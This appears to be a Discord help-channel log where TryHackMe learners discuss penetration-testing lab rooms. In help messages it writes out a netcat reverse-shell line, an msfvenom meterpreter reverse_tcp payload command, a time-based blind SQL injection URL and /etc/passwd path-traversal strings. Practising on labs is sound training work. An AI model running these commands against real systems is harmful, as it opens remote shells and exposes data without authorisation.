im still new but I have done some other rooms and koths that involve sql this is generally what i do : mysql -u root -h <IP> -p
root/root
use users;
select * from User;

Example of in-band SQL injection
SELECT * FROM users WHERE user_id LIKE 'current_user'

a good website I have used is https://www.invicti.com/learn/in-band-sql-injection/

@jaunty orchid

I actually worked it out. SELECT does things other than just selecting. It can do things like math (eg. SELECT 1 + 1; will return the result 2)
so what SELECT 1,2,3 creates and empty table with 3 columns titled "1", "2", "3"

Good job man !!

Please keep your username appropriate @jaunty orchid

what the heck was the username before

No probs. Am I allowed to explain it to the guy below who asked about it?

Please don’t 🙂

No worries. It was supposed to be a cheeky evolution of my original screen name MrSquiggle (because it looks like a bunch of squiggles) but I can see why it might not be appropriate on this discord chanel. Out of curiosity, is the name change only for this channel or does it affect my discord globally?

I can’t control what you do outside of this discord, I just reset your nickname

too saucy for tv

guys

can you help me with my problem?

What's your problem?

i want to finish eternalblue machine

but

!dark

Damn it,

Sure, what's up?

oh, i can't send image here

!docs verify

can i send you?

You need to verify, to attach pictures and embeds.

done

Did you set LHOST?

yea

Which IP?

#general message

Help required

ban this guy

edit: ty

Whats the difference between
select * from users where username='admin';
and
select * from users where username != 'admin';
Does the first one only return the first row with the username admin or something?
Im a little confused

the first one will return data that the username "admin" has, while the second one will return all data except for username "admin".

so the "!=" symbol means "not equal to"

Oh thank you I must have misread.

Gave +1 Rep to @rough epoch

no prob, happy to help!

In the linux priv esc room:
I am compiling C code with the gcc but in the exploitation it shows this message, "
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
"

I have upgraded glibc. Still not working.

Does anyone know about this?

im in active recon and my -nc ip 80 hasnt been working

Are you in the attackbox or VM?

attackbox

You'll need to use a different port.

The attackbox uses port 80.

ah I see, tried to go via the default instructions and should've scrolled down the answer portion. tyvm

i get no reply on "Pracitcal Example (blind xss)". using the right IP-Adress and Port. used the script for cookie exfiltration on subject and content... hmm

Seems to be a compatibility issue between the machine where you compiled the exploit and target. Have you tried compiling the c exploit in your target?

Yeah it's a compatibility issue. It's not possible to compile in the target. It was priv esc NFS practice.
From the tryhackme attackbox, compiling is ok. But from my machine, it's not working. So, i need to solve the issue of compiling.

But how can I solve the problem?
I have upgraded everything.

Have you checked or run which gcc on your target?

I have checked the version of gcc only. Is there anything else to check?

What was the output?

How do I know what ports can be accessed by telnet and what cannot?

Telnet won't be running on it.

and that would be seen by an -sV flag using nmap or is there another flag I should be looking out for?

Sv will pick it up.

got it, tyvm

Does anyone know of any good checklists or resources for beginners when approaching a box to help in making sure you don't forget anything?
For example something like:-
Enumerating:

• use whois/nslookup/dig
  --list of lookup types (A, AAAA, CNAME, MX, SOA, TXT)(
  --common syntaxes for nslookup -eg. nslookup -type=A 10.10.1.1
  --common syntaxes for dig -eg dig 10.10.1.1 MX
• nmap scan
  --request types - ICMP/ARP/TCP/UDP
  ---TCP scan types - SYN ACK, ACK + syntax example
  ---UDP scan - syntax example
  etc...

I hope you get the idea of what I'm asking. Just something that can be used as a checklist but also provide a bit of help with remembering syntaxes etc. I'm sure this will all come naturally after practicing it over and over, but to begin with is quite useful so you are not stuck on a box because you forgot to do something obvious

Hey guys I have a question. I want to be a red teamer. I'm doing Jnr penetration tester path. But I'm having trouble grasping the full concept. So can I do security engineer and coc path first practice it a little then come back to penetration path..What I'm trying to ask is that can I become a red teamer later by first learning blue team

Have you looked at mindmaps? It won't have all the commands or probably have it in a separate document, but it will have a flow of the things you need to check or enumerate.

website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(2),2 from information_schema.tables WHERE table_schema= 'sqli_f___' and table_name = '%';--

Why isnt this working I use the right database name and just the wildcard and there is no syntax error

Am i just stupid and not seeing something? Or am I completely wrong? This is incredibly frustrating.

sometimes _ are used as wildcards in sql stuffs

It's your choice. If you want to know more about blue team, you can take the path, if the load isn't much on you.

So I dont actually have the correct database name? That would make a lot of sense knowing _ are sometimes wildcards. Though the task said to try characters such as - and underscore as well as numbers and letters when enumerating names in this way which is a little confusing.

yeah it is confusing and has caused problems a lot of times for a lot of users

so the sleep become the sign of the return value because there is no visual for the return value, if the sleep is executed then the return is true, if not then false, you can read it more on the materials

so using --script=vuln is generally frowned upon because it makes people lazy right

I'm trying really hard to find out where vulnerabilities could be found via nmap and maybe I should read the modules again or complete the msf modules

nah it is frowned upon in real engagements as some of those scripts are not safe and can cause unintended breakages of the target systems

and searching for vulns is just looking at OS versions and stuff and searching on different databasesfor things that match those versions and running info on them? for example like an -A flag on nmap and then grabbing different pieces of data that might be useful such as smb and etc...

       -sC
           Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target
           network without permission.

from nmaps man page

my bad, tyvm. Ill look deeper into the man pages of all the services I use

i.e if you must use scripts against the target and not wanna break stuff you probably want the safe catogery

I had finished this path before. Just logging back in trying to get my certificate, and its now saying I haven't completed the path and my burp progress appears totally reset? Anyone else experienced this?

you are kinda late to the party on that... but as the burp suite tutorial rooms got updated to work for the newest version of burp said "progress" was reset and you will have to redo it

I see. Kind of annoying, but thanks for the info.

yeah can be annoying but it was the best way to solve the problem

Task 3 For Subdomain Enumeration seems to be out of date. Or maybe Im doing it wrong, but Im copy pasting the search thread into google, so IDK.

anyone know the anser??

nvm isued the tls databse thing

I a ctf - Can i use the pre-installed teminal in Mac or install Linux / kali

Or its the same?

I fell i run in circles...

I installes Python3 - but am still stucked

I don't really know the difference between Macs terminal and Linux's, but just from personal experience I'd recommend using a Kali Linux terminal, easier to use those kinds of tools and is used by any kind of cybersecurity professional so great experience.

if you want to have the same functionality. You’ll probably have to install brew on the mac. Or you could setup boot camp and install linux on it. Mac is a form of unix. So they are different. for example if you need to want to ssh-id-copy. on mac it’s some long complicated command. That’s where brew comes in handy.

Thats one of my issues, install python3, but brew, i tryed a million times, i really cant, will you help in dm?

sure, but not sure i can fully help.

does anyone know the difference between IDOR and File Inclusion? It seems like IDOR can also be used to access unauthorized files in file inclusion

Like is file inclusion just a type of IDOR because they both seem very similar

I'm in the OWASP Juice shop module and unable to get response for task 7. I was able to get the proper response, showing 'xss', but the flag was never presented, not within the scoreboard either. Looking for a bit of assistance, or nudge in the correct direction. Thank you

Hey everyone, having some trouble with Authentication Bypass: Task 2. I typed in the command shown, there's nothing showing errors in regards to my syntax, it does say 10164 errors though. I'm not getting any usernames, im not sure how i can upload my screenshots ive taken

Doing the extra mile challange in the burp intruder room and the length of all responses are somewhat similar there is no significantly shorter one and the shortest is invalid so something is going wrong. I used the correct word lists in the right places and the macro works fine. I dont understand what im doing wrong.

I have some problems with Walking An Application task 3 . Question "What is the directory listing flag?" Why THM{CHANGE_DEFAULT_CREDENTIALS} is wrong ??

More than likely is wrong.

I would like to know if someone faced with this problem .

Can you link the room?

https://tryhackme.com/room/walkinganapplication

task 3
What is the directory listing flag?

Yup.

You have the wrong flag

I have chosen many options to find correct variant . I coundn't

Have you performed a forced directory browser?

NO. I red instruction and there wasn't any mentions about performed a forced directory browser

And I got the flag , but it is . How many flags exists )

Sometimes you have to think outside the material.

Maybe. But I am novice and don't have any experience ,

So I can't think outside the material because I don't have any another material

@proper lake believe it or not, there is material inside material and material outside material.🤪
Jk, try YouTube there are some great vids on that specific subject matter that has you questioning.
Fuck my grammar.

Thansk , Can you share a link ? or name of this video

when using scp, is it possible to use scp command inside ssh or only outside of ssh?

SCP uses the SSH protocol for file transfers.

ok gotcha I most likely did something wrong in the command because I could only copy files using scp while I was outside of ssh

if I used scp inside the ssh, the file seemed to have only been copied inside the ssh and not to my root

It depends on what location or directory you've put in the destination.

Good evening

I'm studying "Exploit Vulnerabilities" rool which can be found here :
https://tryhackme.com/room/exploitingavulnerabilityv2

I'm doing task 5 and I'm on the final question.
I already know the answer, but I have a problem
I'm trying to run the code on my local.

In the first attched screenshot, I have got the first question correctly and I know the vaunarability,
So on the screenshot 2 whenever I try to run the python script, It throws error that the script is not found

My question is, where is those scripts located exactly on linux kali?

Let me answer my question
I found it just by searching for the target script with the script name
I found it at the attached screenshot path

Regarding my previous question
I'm getting the attached image error
any solution?

Try python3 /path/to/file/47887.py <args>

Thank you.
Python was missing

Could someone just give me the answer to burp intruder rooms task 12.
Im following the instructions correctly repeatedly its not working all responses are a similar length.

I understand the process there just don't seem to be any valid credentials.

Won't it defeat the purpose of completing the room altogether?

Ive done it now. And feel very stupid because I didnt notice it needed to be a get not a post request.🤦🏻‍♂️

As a beginner from a non-IT background, I would like to prepare for the Security+ exam. Could you please guide me on how much time I need to dedicate to my preparation? I am asking about the duration required from the beginning to the end in order to fully understand the content and successfully pass the exam. I'm unsure if I should allocate at least 8 months, and since I am new to this field, your guidance in the form of a roadmap would greatly help me.

This depends on many factors, your preexisting knowledge and how much time a week you can dedicate to study being the main ones. You say that you are from a non IT background, but do you know what a switch is? What about the osi model? The security+ is made to build off of the a+ and network+, how much of that content you know will also have an effect on how long you need to study for the security+. Of course you do not need to take these other exams, but you should probably understand the basics of what they cover

That being said #cyber-and-careers is probably a better channel for this type of discussion

Hey I have a doubt like scammers payback and Jim browning which software they use for calling anonymously also voice changing could you please help me to get this?

I don't know much about that stuff, not sure this is really the place to ask either

I believe I know how everything works for them but I’m not saying. Still doing a little more research. But this isn’t the channel or the place to discuss this topic.

Alrighty, I'm almost done with the Jr. Penetration Tester pathway; I've finished the more simple ones as well, such as Pre-Security and Introduction to Cybersecurity. With the goal of learning Penetration Testing, what would be the recommended next pathway to take? I'm guessing "Red Teaming" or "Offensive Pentesting", but I'm not sure if there are other recommendations people have.

#general message

if your goal is only penetration testing #offensive-pentesting-path and #web-fundamentals-path first and then after #red-teaming-path

#web-fundamentals-path can be skipped if you are not gonna pentest web based apps and stuffs

Thanks @sage current, I forgot to mention I did do the web application testing, but I'll be sure to do the offensive pentesting path next. I appreciate the help!

Gave +1 Rep to @sage current

no problem... would also recommend looking into some of the blue team paths as knowing how the defence against some vulns are set up can help you exploit them or work around the protections

For certain-- I am looking to do pentesting, but I still want to learn defensive as well...

I imagine "Purple Team" is where the most experience is...

Hello! When try to run echo c:\tools\nc64.exe -e cmd IP PORT > ... i keep getting:

Write-Output Parameter cannot be processed because the parameter name 'e' is ambiguous
Anyone has seen this before?

Not all netcat versions support the -e option.

Right. But if TryHackMe gave me the VM with that version, it's a bug on their side they need to update for the room, right?

Not sure how this bug/issue reports work on the platform.

Oh.. what room is this?

Windows Privilege Escalation - task 4 (but machine from task 3)

And are you running the echo command in Windows or in your attack machine?

Windows. I was actually using the split interface directly and PowerShell

(Thanks for the help!)

Can you try typing in echo "c:\tools\nc64.exe -e cmd.exe <attacker ip> 4444" > C:\tasks\schtask.bat?

The echo command seems to take the -e option for itself and not on nc64.exe

Let me spin that up again - one sec.

Yes, that seemed to work 🙂 Did a type c:\tasks\schtask.bat and the code is there. Reverse shell didn't work after executing the task but i can figure the rest out heh. Thanks for the help

You're welcome

Anyone who has done junior pentest path can help me in linux privilege escalation

What task? What are you stuck on exactly?

Need help setting up the Breaching AD room. I was able to ping the DC, but was unable to get a nslookup to work on my own machine. Have a feeling I'll have to wait for the network to reset or it could be a DNS issue. This is my first networked room. https://tryhackme.com/room/breachingad

Have you followed the pinned post?

I wrote a post on how to connect via OpenVPN

pinned where?

In #breaching-ad

I see it now. I'm pretty sure I have that done right, but I'll go over it once more

Yes I have that part correct. The DC nameserver is listed first in resolv.conf

let's go to #breaching-ad

nod

Hey everyone, I'm in the Metasploit: Exploitation room. So, I'm trying to answer the questions of Msfvenom but when I run the command msfconsole or Msfvenom it says command not found

In which directory does the tools are in

I'm using the VM

Linux is case sensitive so it should be msfvenom.

Is this your kali VM or the Attackbox?

I know

attackbox

I clicked start the machine

If you can share a screenshot of the error, we can better assist you. You need to verify your account though.

!docs verify

Ok one sec

!notifyme

Ok @harsh nexus, you will now be notified of future announcements.

@prisma raptor I don't know why but it's not working

You need to send the message '!verify' to the TryHackMe bot and provide your discord token.

That's what I did

What response did you get?

I didn't get any response

Hi,
Each time I try to ssh to a tryhackme machine from kali linux I’ve got a permission denied (publickey). Could you help me to fix that issue?

Maybe you're not supposed to?

What room is this please? Not all boxes are intended to be logged into.

Net Sec Challenge

Have you found a private key or password yet? Then keep looking

Not yet

are you connected with your vpn?

Yes I did

Should I set up a ssh key for tryhackme?

no. you should download the openvpn key from your access on your profile

I did that and I can ping the tryhackme machine

The reason why i asked is because I was trying to do one. Found I wasn’t even connected to the correct network

So, should I change the vpn and get another openvpn key?

If you’re connected with openvpn then there’s no need to.

ok

do a nmap scan and go from there. might want to open the ip of your target in a browser.

22/tcp, 8080/tcp open

I can access the web page

but I can’t ssh

correct. most of the rooms have you exploit a website for ssh credentials.

so you might want to try curl http://IPaddress

I see a lot of rooms in this path are locked behind using a premium account, do they have crucial stuff to learn?
I'm mostly learning through THM as a hobby so I prefer not to subscribe if the free rooms teach enough knowledge

Not really, you can find alternative learning materials via Google etc.

What about the rooms with hands-on teaching?

There are still lots of room that does that.

Hey is it possible to spawn a fully interactive shell via meterpreter PHP? I'm going through the gtfo bins but every time I try to use a python priv esc nothing shows

nvm nailed it

easy peasy

Hi I have a question on the "File Inclusion" Room Task 5.

It said if we enter THM we will get the following error:

Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12

but we don't get /var/www/html/THM-4/index.php

and then it went from ../../../../etc/passwd to

include(languages/../../../../../etc/passwd.php)

I don't understand why it became 5 "../".

https://tryhackme.com/room/fileinc

Bro I'm also in the File Inclusion room I swear to god this makes my head explode like I've suddenly landed in the advanced league hahahahah

No kidding… It went from baby steps to running in a single task

hahaha yeah man but did you make it or are you still at it?

i think i'll just skip the room, makes no sense if you don't understand it lol

I watched a few videos on YouTube for that lesson and I kinda got it. Kinda not, so I just move along with it

What are you having trouble with?

@full vapor & @swift spruce I believe the 5 references to move up the directory tree are arbitrary. I was confused at first as well but I think the lesson there is to try and try again as well as driving you to scripting/automation.

I still don’t really fully get it 😞

share link pls we need source

windows privelege escalation/task6: how to connect to windows machine using the attackbox

?

You can use xfreerdp or Remmina if you prefer a GUI or EvilWin-RM if you prefer the CLI

thank u!! is this how we should do this task? its not very clear

Yes, as the topic is already privilege escalation, the assumption is that you already have foundational knowledge on Windows and thus will not handhold you every step of the way.

ah ok thank u very much

Try to do a search first on your own before asking for help to build on your researching skills. It'll be helpful for you later down the line, especially when researching error messages in your scripts or exploits.

i got it thank you

i searched a lot

it was in a folder which one of the users here advised me to search in

Hi!!
I want to know is there any way to download my certificate as pdf format ?

Yeah, just change the url to pdf.

@remote iris thank you 👍🏻

Gave +1 Rep to @remote iris

can someone assist me to find flag2 !
is my find cmd wrong ?
Linux Privilege Escalation >> Task 6

edit :
✅ Solved i was on wrong machine so Ubuntu folder was missing.

hello

Hello,

Concerning the answer: "https://nvd.nist.gov/vuln/full-listing/2021/7 check it" on Vulnerability 101 "Using NVD, how many CVEs were submitted in July 2021?".

I faced with the same issue, I tried to search the same way as "Deleted User" did 2 years ago (interestingly the result is slightly different :O). I found your solution above, but your offered link does not even exist any more. I do not find any solutions to figure out the expected answer.

Anybody here done this before? How do you deal with windows machines? 😭

I feel really lost. KoTH is really hard.

Also is there anyone here instrested to hack together? I wanna have a team. Maybe we could benifit from eachother

There is two boxes on the site that give you help with KoTH

How's everyone doing? I am about to start this path, cannot wait!

i just started it today

I'm having this error message trying to run the php-revshell on the windows webserver VM from What the shell's room

is it a compatibility issue ?

Yes, I would suggest you use another php reverse shell payload from ivan sincek

All right, thanks 👌

Yeah, I got the wrong result too. So I just googled it. :/

I wouldn't go around posting the flag for rooms here, just ask for help for the specific flag you are stuck on and I'm sure someone will help you out eventually

External files such as CSS, JavaScript and Images can be included using the HTML code. In this example, you'll notice that these files are all stored in the same directory. If you view this directory in your web browser, there is a configuration error. What should be displayed is either a blank page or a 403 Forbidden page with an error stating you don't have access to the directory. Instead, the directory listing feature has been enabled, which in fact, lists every file in the directory. Sometimes this isn't an issue, and all the files in the directory are safe to be viewed by the public, but in some instances, backup files, source code or other confidential information could be stored here. In this instance, we get a flag in the flag.txt file.

Did you get that flag?

If I remember that right you have to open website source code and look where CSS, JavaScript and Images are stored. They are in the same directory. ||Just delete the part at the end with CSS or JavaScript or Images and paste that directory into browser adress bar.|| I did this room a few days ago so I'm not 100% sure it went like that, so if you have any questions ask freely

Hello!
I just wanted to ask if anyone else had faced the same issues as I'm facing in Windows Privilege Escalation?
first two Windows VM seems not to connect so far.

I had the same problems for all the privilege escalation modules.

I was able to spin the VM yesterday woth no issue.

yeah, the next day it worked for me too

try again and see, fyi for Windows VMs use remmina instead of brower.

Need help can't seem to run my exploit. I'm on room metasploit:meterpreter error message was Exploit failed:load error cannot load such file active record/association/belong to association

I've already restarted my attck box twice

No dice

w

Thanks for this. Also threw me off lol. Usually the walkthrough portions are more straightforward.

Gave +1 Rep to @digital cape

No problem it happens, I hope you solved it now.

The answer to Question 1 of Task 5 in (Pentesting) File Inclusion Room should be /lab3.php?file=../../../../etc/passwd%00 but the room accepts /lab3.php?file=../../../../etc/passwd.

Are both answers correct?

Haven't done this room myself, but if the web application is adding a file extension to the name of the file you want to read (e.g., /etc/passwd being changed into /etc/passwd.php), then the former should be correct as THM accepts answer tolerance.

Viewing the page source on the "Viewing page source" section in the Jr. Pentest room, I like the little Easter Egg in the console. Hahaha.

Thanks for the sharing about THM's answer tolerance.

Gave +1 Rep to @prisma raptor

The file inclusion section is as clear as mud😖. Anyone else having a go at it?

Why so?

Anyone to help me please? I think I am stuck on the Jr Pentester Path precisely on the Walking the website room

hey what do you need help for ?

Hi, I have problem in Authentication Bypass Task 3

in W1 i wrote the username and selected W2 as password list

still couldn't get the hit

W1

It's because you are targeting the Attackbox.

Please remove this so as not to spoil for other users.

so which IP should I use then?

Did you click on the green Start Machine button in Task 1 or 2?

yes

I got the answer

thanks for your help 😁

Glad I could help.

Hi, I'm having a problem in the metaspolit explotaiton task 6.

i've managed to download the payload to the target machine, and the metasploit handler is recieving, but the session instantly closes whenever it runs

any ideas?

the payload is used is :
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.23.51 LPORT=4444 -f elf > rev_shell.elf

yeah i just forgot to set the payload value on the handler correctly

I am having issue wiith “walking an application task”

What part are you having issues with ?

Task 3 of Walking an application